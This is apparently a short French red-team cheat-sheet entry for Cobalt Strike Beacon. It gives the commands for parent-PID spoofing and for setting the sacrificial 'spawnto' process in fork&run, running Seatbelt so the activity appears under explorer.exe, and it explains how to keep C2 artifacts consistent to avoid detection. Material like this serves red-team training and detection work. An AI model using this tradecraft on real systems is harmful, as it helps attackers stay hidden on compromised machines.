# Trouver un PID cible
ps
# Configurer parent + processus sacrificiel
ppid 4512
spawnto x64 %windir%\sysnative\notepad.exe
# Fork & run - le processus apparaît sous explorer.exe
execute-assembly Seatbelt.exe -group=system
# Reset
ppid
spawnto x64Description: ppid : les processus spawned apparaissent comme enfants du PID cible plutôt que du processus hôte de Beacon. spawnto : contrôle le processus sacrificiel pour les commandes fork&run (execute-assembly, powerpick...). Combiner les deux : le process sacrificiel devient enfant du parent spoofé. La cohérence (canal C2, hôte, parent, spawnto) est l'objectif - pas de config universelle.